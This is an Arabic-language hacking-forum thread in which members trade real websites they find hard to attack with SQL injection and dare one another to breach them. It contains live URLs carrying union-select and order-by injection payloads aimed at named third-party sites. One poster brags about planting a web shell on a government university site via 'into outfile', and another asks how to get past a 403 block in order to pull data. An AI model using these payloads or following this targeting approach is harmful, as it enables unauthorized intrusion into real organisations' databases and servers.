Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]


BlackRose-GHT عضو نشيط
  • شكراً: 50
  • تم شكره 322 مرة في 55 مشاركة

السلام عليكم ورحمة الله

نقاش للتطوير

يقابل الحاقن الكثير من المواقع الصعبة الحقن والتى تصل فى بعض الاحيان للإستحالة

السؤال

هل قابلك مواقع مثل تلك تستطيع مشاركتها معنا لنرى مدى الصعوبة بها

المواقع التى أٌشارك بها بالموضوع


كود PHP:
www.goal.az/livescore/tournament/42 and 0 union select 1,2,3,4,5,6,-- -/news/45011
كود PHP:
http://www.mcmilliancounseling.com/viewblog.php?id=6 
كود PHP:
www.tonibreiss.com/order.php?id=
كود PHP:
www.srpskijezik.edu.rs/index.php?id=2100 
هذا الموقع صعب تصفح الاعمده

كود PHP:
http://www.princeofpoets.com/ar/news.php?cat=43' and 0 union/**/distinctrow Select 1,version()-- -&id=230 
هذا الموقع صعب الحقن ولكنى قمت بحقنه بسهولة بخدعه بسيطه
جرب تحقنه وورينا شطارتك

كود PHP:
http://www.res-jo.com/activities.php?id=10 
تحياتي




توقيع
خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

http://www.sec4ever.com/home/showthread.php?p=101940#post101940





7 أعضاء قالوا شكراً لـ BlackRose-GHT على المشاركة المفيدة:
tapot33 عضو نشيط
  • شكراً: 141
  • تم شكره 64 مرة في 27 مشاركة

كان ودي أشارك موقع وصلت لمرحله اليأس..

بس ماقدر لأنه حساس

UzunDz فريق الحماية للأبد
  • شكراً: 4517
  • تم شكره 5577 مرة في 1384 مشاركة

تنويه ,, ليس كل خطأ ثغرة حقن .. فمثلا الـinput يقبل نوع معين integer وانت تعطيه string فيرجع خطأ ليس بالضرورة يكون مصاب بالحقن.

تم حذف موقع الجامعة لكونه موقع حكومي مصاب ,, واستغلاله يعرضنا للمشاكل

الأعضاء الذين قالوا شكراً لـ UzunDz على المشاركة المفيدة:
BlackRose-GHT عضو نشيط
  • شكراً: 50
  • تم شكره 322 مرة في 55 مشاركة

المشاركة الأصلية كتبت بواسطة tapot33 اقتباس :
كان ودي أشارك موقع وصلت لمرحله اليأس..

بس ماقدر لأنه حساس
شاركنى بيه على الخاص اشوفه

توقيع
خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

http://www.sec4ever.com/home/showthread.php?p=101940#post101940





BlackRose-GHT عضو نشيط
  • شكراً: 50
  • تم شكره 322 مرة في 55 مشاركة

المشاركة الأصلية كتبت بواسطة UzunDz اقتباس :
تنويه ,, ليس كل خطأ ثغرة حقن .. فمثلا الـinput يقبل نوع معين integer وانت تعطيه string فيرجع خطأ ليس بالضرورة يكون مصاب بالحقن.

تم حذف موقع الجامعة لكونه موقع حكومي مصاب ,, واستغلاله يعرضنا للمشاكل
مش مشكلة عزيزي لكن لاتقلق موقع الجامعه لا يمكن إستغلاله للناس العاديين ولا أنصاف المحترفين ولا المحترفين
الموقع لا يمكن حقنة إلا بالحقن xpath وزرع شل into outfile نشرت معرفتي للطريقة مع الصور هذه التى تري ولكني لم أنشر الحل وذلك بعضويتى البريفت فى موقع أشيان الإيراني لذا لا أعرف أحد غيري يستطيع فعلها ^__^






تحياتي وأسف إن عرضت المنتدي للمشاكل بدون قصد

توقيع
خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

http://www.sec4ever.com/home/showthread.php?p=101940#post101940





3 أعضاء قالوا شكراً لـ BlackRose-GHT على المشاركة المفيدة:
UzunDz فريق الحماية للأبد
  • شكراً: 4517
  • تم شكره 5577 مرة في 1384 مشاركة

المشاركة الأصلية كتبت بواسطة BlackRose-GHT اقتباس :
مش مشكلة عزيزي لكن لاتقلق موقع الجامعه لا يمكن إستغلاله للناس العاديين ولا أنصاف المحترفين ولا المحترفين
الموقع لا يمكن حقنة إلا بالحقن xpath وزرع شل into outfile نشرت معرفتي للطريقة مع الصور هذه التى تري ولكني لم أنشر الحل وذلك بعضويتى البريفت فى موقع أشيان الإيراني لذا لا أعرف أحد غيري يستطيع فعلها ^__^






تحياتي وأسف إن عرضت المنتدي للمشاكل بدون قصد
ممكن تشرح اكثر حول زرع شل؟



الحقن عادي error والنتيجة قاعدة البيانات كما في الصورة.
يعني ليس بالشيء الصعب ولا الخرافي مع العلم انه تم حقنه قبل اكثر من سنتين.

2 أعضاء قالوا شكراً لـ UzunDz على المشاركة المفيدة:
lovl عضو نشيط
  • شكراً: 343
  • تم شكره 10 مرة في 7 مشاركة

لدي موقع لم استطع استخراج الاعمدة المصابة بسبب الفوربيدن

كود PHP:
http://arabic.irib.ir/index3.php?option=com_baramej&task=print&id=9922+order+by+6-- 
ي ليت تتخطى وتشرح لنا كيفية التخطي وشكرا لك على م تقدمه من دروس اكثر من رائعه وجزاك الله خير

الأعضاء الذين قالوا شكراً لـ lovl على المشاركة المفيدة:
ww9k عضو مميز
  • شكراً: 164
  • تم شكره 186 مرة في 68 مشاركة

رائع جداً ، بدون مجامله انت المحرك الرئيسي بدون منافس للنهوض بمنتديات هكر العرب مجدداً بعد فترة الخمول

وددت ان اشارك لكن لظروف السفر ، لكن حرصت على ان اعبر عن امتناني وشكري ، وان ماتفعله لوجه الله يتوجب شكرك حقيقه .


بارك الله في دنياك واخرتك و اطال عمرك على طاعته . ( من متابعينك بالفيس بوك دوماً ) .

توقيع
https://twitter.com/s2p
الأعضاء الذين قالوا شكراً لـ ww9k على المشاركة المفيدة:
UzunDz فريق الحماية للأبد
  • شكراً: 4517
  • تم شكره 5577 مرة في 1384 مشاركة

المشاركة الأصلية كتبت بواسطة lovl اقتباس :
لدي موقع لم استطع استخراج الاعمدة المصابة بسبب الفوربيدن
كود PHP:
http://arabic.irib.ir/index3.php?option=com_baramej&task=print&id=9922+order+by+6-- 
ي ليت تتخطى وتشرح لنا كيفية التخطي وشكرا لك على م تقدمه من دروس اكثر من رائعه وجزاك الله خير


ابحث أكثر عن تخطي الفوربدن لأن اول تجربة بعد البحث راح تتخطاه.

ملاحظة:
اذا رأينا ان الموضوع سيتجه لغرفة حقن بدل مناقشة الأهم وهي مراحل تخطي الحماية ,, فهذا غير مقبول خصوصا ان المواقع تقريبا كلها عربية.

4 أعضاء قالوا شكراً لـ UzunDz على المشاركة المفيدة:
Murtada Al-iRaQi عضو مميز
  • شكراً: 196
  • تم شكره 72 مرة في 43 مشاركة

اصعب موقع واجهته هو

الحقن في input اليوزر
وجدت عدد الاعمدة الي هو 6
ولاكن لم استطع ايجاد الاعمدة المصابة
بالتوفيق للجميع

توقيع
Murtada Kamil
Bug Hunter
أدوات الموضوع
انواع عرض الموضوع


Powered by vBulletin® Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.

:: Security By : Sec4ever Team ::

جميع الحقوق محفوظة الحماية للأبد -Security 4 Ever
Sec4ever by Sec4ever
جميع الحقوق محفوظة الحماية للأبد -Security 4 Ever
Sec4ever by Sec4ever